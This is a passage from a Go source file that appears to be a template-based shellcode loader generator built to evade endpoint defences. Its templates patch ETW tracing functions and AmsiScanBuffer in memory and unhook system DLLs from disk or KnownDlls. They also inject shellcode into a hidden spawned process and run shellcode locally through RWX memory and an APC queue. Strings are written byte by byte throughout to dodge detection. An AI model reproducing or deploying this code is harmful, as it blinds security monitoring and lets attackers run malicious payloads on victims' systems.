504 | {{.Variables.ExportName}} 505 | {{.Variables.ExportFunction}} 506 | 507 | func main() { 508 | } 509 | 510 | 511 | //export Run 512 | func Run() { 513 | {{.Variables.Sandbox}} 514 | {{.Variables.ETW}} 515 | {{.Variables.AMSI}} 516 | {{.Variables.Version}} := {{.Variables.Versionfunc}}() 517 | if {{.Variables.Version}} == "10" { 518 | {{.Variables.Reloading}} 519 | } 520 | {{.Variables.ETW}} 521 | {{.Variables.raw_bin}} := [loader].{{.Variables.FuncName}}() 522 | 523 | {{.Variables.Shellcode_Exec_Function}}({{.Variables.raw_bin}}) 524 | } 525 | 526 | {{.Variables.Shellcode_Exec}} 527 | 528 | 529 | {{.Variables.ReloadFunction}} 530 | 531 | ` 532 | } 533 | 534 | func Binary() string { 535 | return ` 536 | {{.Variables.Header}} 537 | 538 | func main() { 539 | {{.Variables.Sandbox}} 540 | {{.Variables.ETW}} 541 | {{.Variables.AMSI}} 542 | time.Sleep({{.Variables.SleepSecond}} * time.Millisecond) 543 | {{.Variables.Version}} := {{.Variables.Versionfunc}}() 544 | {{.Variables.VersionMessage}} 545 | if {{.Variables.Version}} == "10" { 546 | {{.Variables.Reloading}} 547 | } 548 | {{.Variables.ETW}} 549 | {{.Variables.hide}} 550 | {{.Variables.raw_bin}} := [loader].{{.Variables.FuncName}}() 551 | {{.Variables.Shellcode_Exec_Function}}({{.Variables.raw_bin}}) 552 | } 553 | 554 | {{.Variables.Shellcode_Exec}} 555 | 556 | 557 | {{.Variables.ReloadFunction}} 558 | ` 559 | } 560 | 561 | func WriteProcessMemory_Function() string { 562 | return ` 563 | const ( 564 | {{.Variables.errnoERROR_IO_PENDING}}= 997 565 | ) 566 | var {{.Variables.errERROR_IO_PENDING}} error = syscall.Errno({{.Variables.errnoERROR_IO_PENDING}}) 567 | var {{.Variables.procWriteProcessMemory}} = syscall.NewLazyDLL(string([]byte{'k', 'e', 'r', 'n', 'e', 'l', '3', '2',})).NewProc({{.Variables.decode}}("{{.Variables.WriteProcessMemoryName}}")) 568 | 569 | 570 | func {{.Variables.WriteProcessMemory}}({{.Variables.hProcess}} uintptr, {{.Variables.lpBaseAddress}} uintptr, {{.Variables.lpBuffer}} *byte, {{.Variables.nSize}} uintptr, {{.Variables.lpNumberOfBytesWritten}} *uintptr) (err error) { 571 | r1, _, e1 := syscall.Syscall6({{.Variables.procWriteProcessMemory}}.Addr(), 5, uintptr({{.Variables.hProcess}}), uintptr({{.Variables.lpBaseAddress}}), uintptr(unsafe.Pointer({{.Variables.lpBuffer}})), uintptr({{.Variables.nSize}}), uintptr(unsafe.Pointer({{.Variables.lpNumberOfBytesWritten}})), 0) 572 | if r1 == 0 { 573 | if e1 != 0 { 574 | err = {{.Variables.errnoErr}}(e1) 575 | } else { 576 | err = syscall.EINVAL 577 | } 578 | } 579 | return 580 | } 581 | 582 | func {{.Variables.errnoErr}}(e syscall.Errno) error { 583 | switch e { 584 | case 0: 585 | return nil 586 | case {{.Variables.errnoERROR_IO_PENDING}}: 587 | return {{.Variables.errERROR_IO_PENDING}} 588 | } 589 | 590 | return e 591 | } 592 | ` 593 | } 594 | 595 | func ETW_Function() string { 596 | return ` 597 | var {{.Variables.procEtwNotificationRegister}} = syscall.NewLazyDLL(string([]byte{'n', 't', 'd', 'l', 'l',})).NewProc({{.Variables.decode}}("{{.Variables.EtwNotificationRegisterName}}")) 598 | var {{.Variables.procEtwEventRegister}} = syscall.NewLazyDLL(string([]byte{'n', 't', 'd', 'l', 'l',})).NewProc({{.Variables.decode}}("{{.Variables.EtwEventRegisterName}}")) 599 | var {{.Variables.procEtwEventWriteFull}} = syscall.NewLazyDLL(string([]byte{'n', 't', 'd', 'l', 'l',})).NewProc({{.Variables.decode}}("{{.Variables.EtwEventWriteFullName}}")) 600 | var {{.Variables.procEtwEventWrite}} = syscall.NewLazyDLL(string([]byte{'n', 't', 'd', 'l', 'l',})).NewProc({{.Variables.decode}}("{{.Variables.EtwEventWriteName}}")) 601 | 602 | func {{.Variables.ETW}}() { 603 | {{.Variables.handle}} := uintptr(0xffffffffffffffff) 604 | {{.Variables.dataAddr}} := []uintptr{ {{.Variables.procEtwNotificationRegister}}.Addr(), {{.Variables.procEtwEventRegister}}.Addr(), {{.Variables.procEtwEventWriteFull}}.Addr(), {{.Variables.procEtwEventWrite}}.Addr()} 605 | for i, _ := range {{.Variables.dataAddr}} { 606 | {{.Variables.data}}, _ := hex.DecodeString("4833C0C3") 607 | var {{.Variables.nLength}} uintptr 608 | {{.Variables.datalength}} := len({{.Variables.data}}) 609 | {{.Variables.WriteProcessMemory}}({{.Variables.handle}}, {{.Variables.dataAddr}}[i], &{{.Variables.data}}[0], uintptr(uint32({{.Variables.datalength}})), &{{.Variables.nLength}}) 610 | } 611 | } 612 | 613 | func {{.Variables.RemoteETW}}({{.Variables.handle}} windows.Handle) { 614 | {{.Variables.dataAddr}} := []uintptr{ {{.Variables.procEtwNotificationRegister}}.Addr(), {{.Variables.procEtwEventRegister}}.Addr(), {{.Variables.procEtwEventWriteFull}}.Addr(), {{.Variables.procEtwEventWrite}}.Addr()} 615 | for i, _ := range {{.Variables.dataAddr}} { 616 | {{.Variables.data}}, _ := hex.DecodeString("4833C0C3") 617 | var {{.Variables.nLength}} uintptr 618 | {{.Variables.datalength}} := len({{.Variables.data}}) 619 | {{.Variables.WriteProcessMemory}}(uintptr({{.Variables.handle}}), {{.Variables.dataAddr}}[i], &{{.Variables.data}}[0], uintptr(uint32({{.Variables.datalength}})), &{{.Variables.nLength}}) 620 | } 621 | } 622 | 623 | ` 624 | } 625 | 626 | func AMSI_Function() string { 627 | return ` 628 | func {{.Variables.AMSI}}() { 629 | var {{.Variables.handle}} uint64 630 | {{.Variables.handle}} = 0xffffffffffffffff 631 | {{.Variables.ll}}, _ := windows.LoadLibrary(string([]byte{'a','m','s','i','.','d','l','l'})) 632 | {{.Variables.addr}}, _ := windows.GetProcAddress({{.Variables.ll}}, string([]byte{'a','m','s','i','S','c','a','n','B','u','f','f','e','r'})) 633 | {{.Variables.data}}, _ := hex.DecodeString("B857000780C3") 634 | var {{.Variables.nLength}} uintptr 635 | {{.Variables.datalength}} := len({{.Variables.data}}) 636 | {{.Variables.WriteProcessMemory}}(uintptr({{.Variables.handle}}), uintptr(uint({{.Variables.addr}})), &{{.Variables.data}}[0], uintptr(uint32({{.Variables.datalength}})), &{{.Variables.nLength}}) 637 | } 638 | ` 639 | } 640 | 641 | func Procces_Injection() string { 642 | return ` 643 | var {{.Variables.procWriteProcessMemory}} = syscall.NewLazyDLL(string([]byte{'k', 'e', 'r', 'n', 'e', 'l', '3', '2',})).NewProc("WriteProcessMemory") 644 | var {{.Variables.funcNtCreateThreadEx}} = syscall.NewLazyDLL(string([]byte{'n', 't', 'd', 'l', 'l',})).NewProc("NtCreateThreadEx") 645 | var {{.Variables.funcNtWriteVirtualMemory}} = syscall.NewLazyDLL(string([]byte{'n', 't', 'd', 'l', 'l',})).NewProc("NtWriteVirtualMemory") 646 | var {{.Variables.funcNtAllocateVirtualMemory}} = syscall.NewLazyDLL(string([]byte{'n', 't', 'd', 'l', 'l',})).NewProc("NtAllocateVirtualMemory") 647 | var {{.Variables.funcNtProtectVirtualMemory}} = syscall.NewLazyDLL(string([]byte{'n', 't', 'd', 'l', 'l',})).NewProc("NtProtectVirtualMemory") 648 | 649 | var {{.Variables.procEnumProcessModules}} = syscall.NewLazyDLL(string([]byte{'p', 's', 'a', 'p', 'i',})).NewProc("EnumProcessModules") 650 | var {{.Variables.procGetModuleBaseName}} = syscall.NewLazyDLL(string([]byte{'p', 's', 'a', 'p', 'i',})).NewProc("GetModuleBaseNameW") 651 | var {{.Variables.procGetModuleInformation}} = syscall.NewLazyDLL(string([]byte{'p', 's', 'a', 'p', 'i',})).NewProc("GetModuleInformation") 652 | 653 | func errno(e1 error) error { 654 | if e1, ok := e1.(syscall.Errno); ok && e1 == 0 { 655 | e1 = syscall.EINVAL 656 | } 657 | return e1 658 | } 659 | 660 | type SyscallError struct { 661 | call string 662 | err error 663 | } 664 | 665 | func (e *SyscallError) Error() string { 666 | return fmt.Sprintf("%s: %v", e.call, e.err) 667 | } 668 | 669 | const ( 670 | MEM_FREE = 0x100 << 8 671 | MEM_COMMIT = 0x10 << 8 672 | MEM_RESERVE = 0x20 << 8 673 | ) 674 | 675 | type StartupInfoEx struct { 676 | windows.StartupInfo 677 | AttributeList *PROC_THREAD_ATTRIBUTE_LIST 678 | } 679 | type PROC_THREAD_ATTRIBUTE_LIST struct { 680 | dwFlags uint32 681 | size uint64 682 | count uint64 683 | reserved uint64 684 | unknown *uint64 685 | entries []*PROC_THREAD_ATTRIBUTE_ENTRY 686 | } 687 | type PROC_THREAD_ATTRIBUTE_ENTRY struct { 688 | attribute *uint32 689 | cbSize uintptr 690 | lpValue uintptr 691 | } 692 | 693 | type MemoryBasicInfo struct { 694 | BaseAddress uintptr 695 | AllocationBase uintptr 696 | AllocationProtect uint32 697 | RegionSize uintptr 698 | State uint32 699 | Protect uint32 700 | Type uint32 701 | } 702 | 703 | type MODULEINFO struct { 704 | LpBaseOfDll uintptr 705 | SizeOfImage uint32 706 | EntryPoint uintptr 707 | } 708 | 709 | func {{.Variables.CreateProcess}}() *syscall.ProcessInformation { 710 | var {{.Variables.si}} syscall.StartupInfo 711 | var {{.Variables.pi}} syscall.ProcessInformation 712 | 713 | {{.Variables.Target}} := "{{.Variables.processpath}}" 714 | {{.Variables.commandLine}}, {{.Variables.err}} := syscall.UTF16PtrFromString({{.Variables.Target}}) 715 | 716 | if {{.Variables.err}} != nil { 717 | panic({{.Variables.err}}) 718 | } 719 | var {{.Variables.startupInfo}} StartupInfoEx 720 | {{.Variables.si}}.Cb = uint32(unsafe.Sizeof({{.Variables.startupInfo}})) 721 | {{.Variables.si}}.Flags |= windows.STARTF_USESHOWWINDOW 722 | {{.Variables.si}}.ShowWindow = windows.SW_HIDE 723 | 724 | {{.Variables.err}} = syscall.CreateProcess( 725 | nil, 726 | {{.Variables.commandLine}}, 727 | nil, 728 | nil, 729 | false, 730 | 0, 731 | nil, 732 | nil, 733 | &{{.Variables.si}}, 734 | &{{.Variables.pi}}) 735 | 736 | if {{.Variables.err}} != nil { 737 | panic({{.Variables.err}}) 738 | } 739 | 740 | return &{{.Variables.pi}} 741 | } 742 | func {{.Variables.GetModuleInformation}}({{.Variables.hProcess}} windows.Handle, {{.Variables.hModule}} windows.Handle) (MODULEINFO, error) { 743 | {{.Variables.mi}} := MODULEINFO{} 744 | _, _, {{.Variables.err}} := {{.Variables.procGetModuleInformation}}.Call( 745 | uintptr({{.Variables.hProcess}}), 746 | uintptr({{.Variables.hModule}}), 747 | uintptr(unsafe.Pointer(&{{.Variables.mi}})), 748 | uintptr(uint32(unsafe.Sizeof({{.Variables.mi}})))) 749 | if {{.Variables.err}}.(syscall.Errno) != 0 { 750 | return {{.Variables.mi}}, {{.Variables.err}} 751 | } 752 | return {{.Variables.mi}}, nil 753 | } 754 | 755 | func {{.Variables.GetModuleBaseName}}({{.Variables.process}} windows.Handle, {{.Variables.module}} windows.Handle, {{.Variables.outString}} *uint16, {{.Variables.size}} uint32) ({{.Variables.n}} int, err error) { 756 | r1, _, e1 := {{.Variables.procGetModuleBaseName}}.Call( 757 | uintptr({{.Variables.process}}), 758 | uintptr({{.Variables.module}}), 759 | uintptr(unsafe.Pointer({{.Variables.outString}})), 760 | uintptr({{.Variables.size}}), 761 | ) 762 | if r1 == 0 { 763 | return 0, errno(e1) 764 | } 765 | return int(r1), nil 766 | } 767 | 768 | func {{.Variables.EnumProcessModules}}({{.Variables.process}} windows.Handle, {{.Variables.modules}} []windows.Handle) ({{.Variables.n}} int, {{.Variables.err}} error) { 769 | var {{.Variables.needed}} int32 770 | const {{.Variables.handleSize}} = unsafe.Sizeof({{.Variables.modules}}[0]) 771 | r1, _, e1 := {{.Variables.procEnumProcessModules}}.Call( 772 | uintptr({{.Variables.process}}), 773 | uintptr(unsafe.Pointer(&{{.Variables.modules}}[0])), 774 | {{.Variables.handleSize}}*uintptr(len({{.Variables.modules}})), 775 | uintptr(unsafe.Pointer(&{{.Variables.needed}})), 776 | ) 777 | if r1 == 0 { 778 | {{.Variables.err}} = errno(e1) 779 | return 0, {{.Variables.err}} 780 | } 781 | {{.Variables.n}} = int(uintptr({{.Variables.needed}}) / {{.Variables.handleSize}}) 782 | return {{.Variables.n}}, nil 783 | } 784 | 785 | 786 | 787 | func {{.Variables.FunctionName}}({{.Variables.raw_bin}} []byte) { 788 | {{.Variables.pi}} := {{.Variables.CreateProcess}}() 789 | {{.Variables.PPIDMessage}} 790 | time.Sleep(5 * time.Second) 791 | {{.Variables.hh}}, {{.Variables.err}} := windows.OpenProcess({{.Variables.PROCESS_ALL_ACCESS}}, false, {{.Variables.pi}}.ProcessId) 792 | if {{.Variables.err}} != nil { 793 | } 794 | {{.Variables.modules}} := make([]windows.Handle, 255) 795 | {{.Variables.n}}, {{.Variables.err}} := {{.Variables.EnumProcessModules}}({{.Variables.hh}}, {{.Variables.modules}}) 796 | if {{.Variables.err}} != nil { 797 | fmt.Println(&SyscallError{"EnumProcessModules", {{.Variables.err}}}) 798 | } 799 | if {{.Variables.n}} < len({{.Variables.modules}}) { 800 | {{.Variables.modules}} = {{.Variables.modules}}[:{{.Variables.n}}] 801 | } 802 | {{.Variables.RemoteReloading}} 803 | {{.Variables.ModuleMessage}} 804 | var {{.Variables.buf}} = make([]uint16, 255) 805 | for _, {{.Variables.mod}} := range {{.Variables.modules}} { 806 | {{.Variables.MI}}, _ := {{.Variables.GetModuleInformation}}({{.Variables.hh}}, {{.Variables.mod}}) 807 | {{.Variables.n}}, {{.Variables.err}} := {{.Variables.GetModuleBaseName}}({{.Variables.hh}}, {{.Variables.mod}}, &{{.Variables.buf}}[0], uint32(len({{.Variables.buf}}))) 808 | if {{.Variables.err}} != nil { 809 | } 810 | {{.Variables.s}} := windows.UTF16ToString({{.Variables.buf}}[:{{.Variables.n}}]) 811 | if {{.Variables.s}} == "ntdll.dll" { 812 | {{.Variables.RemoteModuleEnumeration}} 813 | {{.Variables.RemoteModuleReloading}}("C:\\Windows\\System32\\ntdll.dll", {{.Variables.MI}}.LpBaseOfDll, {{.Variables.hh}}) 814 | {{.Variables.RemoteModuleMessage}} 815 | } 816 | if {{.Variables.s}} == "KERNEL32.DLL" { 817 | {{.Variables.RemoteModuleEnumeration}} 818 | {{.Variables.RemoteModuleReloading}}("C:\\Windows\\System32\\kernel32.dll", {{.Variables.MI}}.LpBaseOfDll, {{.Variables.hh}}) 819 | {{.Variables.RemoteModuleMessage}} 820 | } 821 | if {{.Variables.s}} == "KERNELBASE.dll" { 822 | {{.Variables.RemoteModuleEnumeration}} 823 | {{.Variables.RemoteModuleReloading}}("C:\\Windows\\System32\\kernelbase.dll", {{.Variables.MI}}.LpBaseOfDll, {{.Variables.hh}}) 824 | {{.Variables.RemoteModuleMessage}} 825 | } 826 | } 827 | 828 | {{.Variables.RemoteETW}}({{.Variables.hh}}) 829 | {{.Variables.Injecting}} 830 | {{.Variables.shellcode}} := {{.Variables.raw_bin}} 831 | {{.Variables.oldProtect}} := windows.PAGE_READWRITE 832 | var {{.Variables.lpBaseAddress}} uintptr 833 | {{.Variables.size}} := len({{.Variables.shellcode}}) 834 | 835 | {{.Variables.funcNtAllocateVirtualMemory}}.Call(uintptr({{.Variables.pi}}.Process), uintptr(unsafe.Pointer(&{{.Variables.lpBaseAddress}})), 0, uintptr(unsafe.Pointer(&{{.Variables.size}})), windows.MEM_COMMIT|windows.MEM_RESERVE, windows.PAGE_READWRITE) 836 | 837 | {{.Variables.funcNtWriteVirtualMemory}}.Call(uintptr({{.Variables.pi}}.Process), {{.Variables.lpBaseAddress}}, uintptr(unsafe.Pointer(&{{.Variables.shellcode}}[0])), uintptr({{.Variables.size}}), 0) 838 | 839 | {{.Variables.funcNtProtectVirtualMemory}}.Call(uintptr({{.Variables.pi}}.Process), uintptr(unsafe.Pointer(&{{.Variables.lpBaseAddress}})), uintptr(unsafe.Pointer(&{{.Variables.size}})), windows.PAGE_EXECUTE_READ, uintptr(unsafe.Pointer(&{{.Variables.oldProtect}}))) 840 | 841 | {{.Variables.funcNtCreateThreadEx}}.Call(uintptr(unsafe.Pointer(&{{.Variables.pi}}.Thread)), windows.GENERIC_EXECUTE, 0, uintptr({{.Variables.pi}}.Process), {{.Variables.lpBaseAddress}}, {{.Variables.lpBaseAddress}}, 0, 0, 0, 0, 0) 842 | 843 | syscall.CloseHandle({{.Variables.pi}}.Thread) 844 | 845 | {{.Variables.Injected}} 846 | } 847 | func {{.Variables.RemoteModuleReloading}}({{.Variables.name}} string, {{.Variables.addr}} uintptr, {{.Variables.handle}} windows.Handle) error { 848 | {{.Variables.dll}}, {{.Variables.error}} := ioutil.ReadFile({{.Variables.name}}) 849 | if {{.Variables.error}} != nil { 850 | return {{.Variables.error}} 851 | } 852 | {{.Variables.file}}, {{.Variables.error}} := pe.Open({{.Variables.name}}) 853 | if {{.Variables.error}} != nil { 854 | return {{.Variables.error}} 855 | } 856 | {{.Variables.x}} := {{.Variables.file}}.Section(".text") 857 | {{.Variables.bytes}} := {{.Variables.dll}}[{{.Variables.x}}.Offset:{{.Variables.x}}.Size] 858 | {{.Variables.dllBase}} := {{.Variables.addr}} 859 | {{.Variables.dllOffset}} := uint({{.Variables.dllBase}}) + uint({{.Variables.x}}.VirtualAddress) 860 | {{.Variables.rawbytes}} := fmt.Sprintf("%X", {{.Variables.bytes}}) 861 | {{.Variables.data}}, _ := hex.DecodeString(string({{.Variables.rawbytes}})) 862 | {{.Variables.regionsize}} := len({{.Variables.bytes}}) 863 | {{.Variables.offsetaddr}} := uintptr({{.Variables.dllOffset}}) 864 | var {{.Variables.nLength}} uintptr 865 | {{.Variables.WriteProcessMemory}}(uintptr({{.Variables.handle}}), {{.Variables.offsetaddr}}, &{{.Variables.data}}[0], uintptr(uint32({{.Variables.regionsize}})), &{{.Variables.nLength}}) 866 | 867 | return nil 868 | } 869 | ` 870 | } 871 | 872 | func Syscall_Alloc() string { 873 | return ` 874 | func {{.Variables.FunctionName}}({{.Variables.raw_bin}} []byte){ 875 | var {{.Variables.phandle}} uint64 876 | var {{.Variables.baseA}}, {{.Variables.zerob}}, {{.Variables.alloctype}}, {{.Variables.protect}} uintptr 877 | {{.Variables.phandle}} = 0xffffffffffffffff 878 | {{.Variables.regionsizep}} := len({{.Variables.raw_bin}}) 879 | {{.Variables.regionsize}} := uintptr({{.Variables.regionsizep}}) 880 | {{.Variables.protect}} = 0x40 881 | {{.Variables.alloctype}} = 0x3000 882 | {{.Variables.AllocatingMessage}} 883 | {{.Variables.ptr}} := [loader].[Allocate]({{.Variables.customsyscall}}, {{.Variables.phandle}}, {{.Variables.baseA}}, {{.Variables.zerob}}, {{.Variables.regionsize}}, {{.Variables.alloctype}}, {{.Variables.protect}}, 0) 884 | {{.Variables.buff}} := (*[1890000]byte)(unsafe.Pointer({{.Variables.ptr}})) 885 | for x, y := range []byte({{.Variables.raw_bin}}) { 886 | {{.Variables.buff}} [x] = y 887 | } 888 | {{.Variables.SyscallMessage}} 889 | syscall.Syscall({{.Variables.ptr}}, 0, 0, 0, 0,) 890 | } 891 | ` 892 | } 893 | 894 | func Syscall_RtlCopy() string { 895 | return ` 896 | func {{.Variables.FunctionName}}({{.Variables.raw_bin}} []byte){ 897 | {{.Variables.ntdll}} := windows.NewLazySystemDLL("ntdll.dll") 898 | {{.Variables.kernel32}} := windows.NewLazySystemDLL("kernel32") 899 | {{.Variables.RtlCopyMemory}} := {{.Variables.ntdll}}.NewProc("RtlCopyMemory") 900 | {{.Variables.VirtualAlloc}} := {{.Variables.kernel32}}.NewProc("VirtualAlloc") 901 | 902 | var {{.Variables.alloctype}}, {{.Variables.protect}} uintptr 903 | var {{.Variables.oldptrperms}} uintptr 904 | {{.Variables.handle}} := uintptr(0xffffffffffffffff) 905 | {{.Variables.regionsize}} := uintptr(len({{.Variables.raw_bin}})) 906 | {{.Variables.protect}} = 0x40 907 | {{.Variables.alloctype}} = 0x3000 908 | {{.Variables.ptr}}, _, _ := {{.Variables.VirtualAlloc}}.Call(0, uintptr(len({{.Variables.raw_bin}})), {{.Variables.alloctype}}, {{.Variables.protect}}) 909 | 910 | {{.Variables.RtlCopyMemoryMessage}} 911 | {{.Variables.RtlCopyMemory}}.Call({{.Variables.ptr}}, (uintptr)(unsafe.Pointer(&{{.Variables.raw_bin}}[0])), uintptr(len({{.Variables.raw_bin}}))) 912 | {{.Variables.VirtualProtectMessage}} 913 | 914 | 915 | 916 | [loader].[NtProtectVirtualMemoryprep]( 917 | {{.Variables.customsyscallVP}}, 918 | {{.Variables.handle}}, 919 | (*uintptr)(unsafe.Pointer(&{{.Variables.ptr}})), 920 | &{{.Variables.regionsize}}, 921 | 0x20, 922 | &{{.Variables.oldptrperms}}, 923 | ) 924 | {{.Variables.SyscallMessage}} 925 | syscall.Syscall({{.Variables.ptr}}, 0, 0, 0, 0) 926 | } 927 | ` 928 | } 929 | 930 | func Syscall_NtQueueAPCThreadEx_Local() string { 931 | return ` 932 | const ( 933 | QUEUE_USER_APC_FLAGS_NONE = iota 934 | QUEUE_USER_APC_FLAGS_SPECIAL_USER_APC 935 | QUEUE_USER_APC_FLGAS_MAX_VALUE 936 | ) 937 | 938 | 939 | func {{.Variables.FunctionName}}({{.Variables.raw_bin}} []byte){ 940 | 941 | {{.Variables.kernel32}} := windows.NewLazySystemDLL("kernel32.dll") 942 | {{.Variables.ntdll}} := windows.NewLazySystemDLL("ntdll.dll") 943 | {{.Variables.RtlCopyMemory}} := {{.Variables.ntdll}}.NewProc("RtlCopyMemory") 944 | {{.Variables.NtQueueApcThreadEx}} := {{.Variables.ntdll}}.NewProc("NtQueueApcThreadEx") 945 | {{.Variables.GetCurrentThread}} := {{.Variables.kernel32}}.NewProc("GetCurrentThread") 946 | 947 | var {{.Variables.baseA}}, {{.Variables.zerob}}, {{.Variables.alloctype}}, {{.Variables.protect}} uintptr 948 | var {{.Variables.phandle}} uint64 949 | var {{.Variables.oldptrperms}} uintptr 950 | {{.Variables.handle}} := uintptr(0xffffffffffffffff) 951 | {{.Variables.phandle}} = 0xffffffffffffffff 952 | {{.Variables.regionsize}} := uintptr(len({{.Variables.raw_bin}})) 953 | {{.Variables.protect}} = 0x40 954 | {{.Variables.alloctype}} = 0x3000 955 | {{.Variables.AllocatingMessage}} 956 | {{.Variables.ptr}} := [loader].[Allocate]({{.Variables.customsyscall}}, {{.Variables.phandle}}, {{.Variables.baseA}}, {{.Variables.zerob}}, uintptr({{.Variables.regionsize}}), {{.Variables.alloctype}}, {{.Variables.protect}}, 0) 957 | {{.Variables.RtlCopyMemoryMessage}} 958 | {{.Variables.RtlCopyMemory}}.Call({{.Variables.ptr}}, (uintptr)(unsafe.Pointer(&{{.Variables.raw_bin}}[0])), uintptr(len({{.Variables.raw_bin}}))) 959 | {{.Variables.VirtualProtectMessage}} 960 | [loader].[NtProtectVirtualMemoryprep]( 961 | {{.Variables.customsyscallVP}}, 962 | {{.Variables.handle}}, 963 | (*uintptr)(unsafe.Pointer(&{{.Variables.ptr}})), 964 | &{{.Variables.regionsize}}, 965 | 0x20, 966 | &{{.Variables.oldptrperms}}, 967 | ) 968 | {{.Variables.GetCurrentThreadMessage}} 969 | {{.Variables.thread}}, _, _ := {{.Variables.GetCurrentThread}}.Call() 970 | {{.Variables.NtQueueApcThreadExMessage}} 971 | {{.Variables.NtQueueApcThreadEx}}.Call({{.Variables.thread}}, QUEUE_USER_APC_FLAGS_SPECIAL_USER_APC, uintptr({{.Variables.ptr}}), 0, 0, 0) 972 | 973 | } 974 | ` 975 | } 976 | 977 | func Disk_Refresh() string { 978 | return ` 979 | func {{.Variables.Reloading}} error { 980 | {{.Variables.DLLname}} := []string{string([]byte{'C', ':', '\\', 'W', 'i', 'n', 'd', 'o', 'w', 's', '\\', 'S', 'y', 's', 't', 'e', 'm', '3', '2', '\\', 'k', 'e', 'r', 'n', 'e', 'l', '3', '2', '.', 'd', 'l', 'l'}), 981 | string([]byte{'C', ':', '\\', 'W', 'i', 'n', 'd', 'o', 'w', 's', '\\', 'S', 'y', 's', 't', 'e', 'm', '3', '2', '\\', 'k', 'e', 'r', 'n', 'e', 'l', 'b', 'a', 's', 'e', '.', 'd', 'l', 'l'}), 982 | string([]byte{'C', ':', '\\', 'W', 'i', 'n', 'd', 'o', 'w', 's', '\\', 'S', 'y', 's', 't', 'e', 'm', '3', '2', '\\', 'a', 'd', 'v', 'a', 'p', 'i', '3', '2', '.', 'd', 'l', 'l'}), 983 | string([]byte{'C', ':', '\\', 'W', 'i', 'n', 'd', 'o', 'w', 's', '\\', 'S', 'y', 's', 't', 'e', 'm', '3', '2', '\\', 'n', 't', 'd', 'l', 'l', '.', 'd', 'l', 'l'})} 984 | 985 | for i, _ := range {{.Variables.DLLname}} { 986 | {{.Variables.ReloadingMessage}} 987 | {{.Variables.dll}}, {{.Variables.error}} := ioutil.ReadFile({{.Variables.DLLname}}[i]) 988 | if {{.Variables.error}} != nil { 989 | return {{.Variables.error}} 990 | } 991 | {{.Variables.file}}, {{.Variables.error}} := pe.Open({{.Variables.DLLname}}[i]) 992 | if {{.Variables.error}} != nil { 993 | return {{.Variables.error}} 994 | } 995 | {{.Variables.x}} := {{.Variables.file}}.Section(string([]byte{'.', 't', 'e', 'x', 't'})) 996 | {{.Variables.bytes}} := {{.Variables.dll}}[{{.Variables.x}}.Offset:{{.Variables.x}}.Size] 997 | {{.Variables.loaddll}}, {{.Variables.error}} := windows.LoadDLL({{.Variables.DLLname}}[i]) 998 | if {{.Variables.error}} != nil { 999 | return {{.Variables.error}} 1000 | } 1001 | {{.Variables.handle}} := {{.Variables.loaddll}}.Handle 1002 | {{.Variables.dllBase}} := uintptr({{.Variables.handle}}) 1003 | {{.Variables.dllOffset}} := uint({{.Variables.dllBase}}) + uint({{.Variables.x}}.VirtualAddress) 1004 | {{.Variables.regionsize}} := uintptr(len({{.Variables.bytes}})) 1005 | {{.Variables.handlez}} := uintptr(0xffffffffffffffff) 1006 | var {{.Variables.oldfartcodeperms}} uintptr 1007 | {{.Variables.Address}} := {{.Variables.FindAddress}}() 1008 | 1009 | {{.Variables.runfunc}}, _ := [loader].[NtProtectVirtualMemoryJMPprep]( 1010 | {{.Variables.customsyscallVP}}, 1011 | {{.Variables.Address}}, 1012 | {{.Variables.handlez}}, 1013 | (*uintptr)(unsafe.Pointer(&{{.Variables.dllOffset}})), 1014 | &{{.Variables.regionsize}}, 1015 | 0x40, 1016 | &{{.Variables.oldfartcodeperms}}, 1017 | ) 1018 | if {{.Variables.runfunc}} != 0 { 1019 | } 1020 | for i := 0; i < len({{.Variables.bytes}}); i++ { 1021 | {{.Variables.loc}} := uintptr({{.Variables.dllOffset}} + uint(i)) 1022 | {{.Variables.mem}} := (*[1]byte)(unsafe.Pointer({{.Variables.loc}})) 1023 | (*{{.Variables.mem}})[0] = {{.Variables.bytes}}[i] 1024 | } 1025 | {{.Variables.runfunc}}, _ = [loader].[NtProtectVirtualMemoryJMPprep]( 1026 | {{.Variables.customsyscallVP}}, 1027 | {{.Variables.Address}}, 1028 | {{.Variables.handlez}}, 1029 | (*uintptr)(unsafe.Pointer(&{{.Variables.dllOffset}})), 1030 | &{{.Variables.regionsize}}, 1031 | 0x20, 1032 | &{{.Variables.oldfartcodeperms}}, 1033 | ) 1034 | } 1035 | return nil 1036 | } 1037 | 1038 | 1039 | ` 1040 | } 1041 | 1042 | func KnownDLL_Refresh() string { 1043 | return ` 1044 | var {{.Variables.NtOpenSection}} uint16 1045 | var {{.Variables.NtMapViewOfSection}} uint16 1046 | var {{.Variables.mxKeSFQASvbvx}} uint16 1047 | func {{.Variables.Reloading}} { 1048 | {{.Variables.DLLname}} := []string{string([]byte{'n', 't', 'd', 'l', 'l', '.', 'd', 'l', 'l'}), 1049 | string([]byte{'k', 'e', 'r', 'n', 'e', 'l', '3', '2', '.', 'd', 'l', 'l'}), 1050 | string([]byte{'k', 'e', 'r', 'n', 'e', 'l', 'b', 'a', 's', 'e', '.', 'd', 'l', 'l'}), 1051 | string([]byte{'a', 'd', 'v', 'a', 'p', 'i', '3', '2', '.', 'd', 'l', 'l'})} 1052 | 1053 | for i, _ := range {{.Variables.DLLname}} { 1054 | KnownDLL({{.Variables.DLLname}}[i]) 1055 | } 1056 | } 1057 | 1058 | var procNtOpenSection = syscall.NewLazyDLL("ntdll.dll").NewProc("NtOpenSection") 1059 | var procNtMapViewOfSection = syscall.NewLazyDLL("ntdll.dll").NewProc("NtMapViewOfSection") 1060 | var procNtUnmapViewOfSection = syscall.NewLazyDLL("ntdll.dll").NewProc("NtUnmapViewOfSection") 1061 | 1062 | type sstring struct { 1063 | PWstr *uint16 1064 | } 1065 | 1066 | func (s sstring) String() string { 1067 | return windows.UTF16PtrToString(s.PWstr) 1068 | } 1069 | 1070 | func KnownDLL({{.Variables.DLL}} string) []byte { 1071 | {{.Variables.ReloadingMessage}} 1072 | var {{.Variables.KnownDll}} , {{.Variables.sztViewSize}} , {{.Variables.CleanSystemDLL}} uintptr 1073 | {{.Variables.handle}} := uintptr(0xffffffffffffffff) 1074 | {{.Variables.ntPathW}} := "\\" + string([]byte{'K', 'n', 'o', 'w', 'n', 'D', 'l', 'l', 's'}) + "\\" + {{.Variables.DLL}} 1075 | {{.Variables.ntPath}}, _ := windows.NewNTUnicodeString({{.Variables.ntPathW}}) 1076 | {{.Variables.objectAttributes}} := windows.OBJECT_ATTRIBUTES{} 1077 | {{.Variables.objectAttributes}}.Attributes = 0x00000040 1078 | {{.Variables.objectAttributes}}.ObjectName = 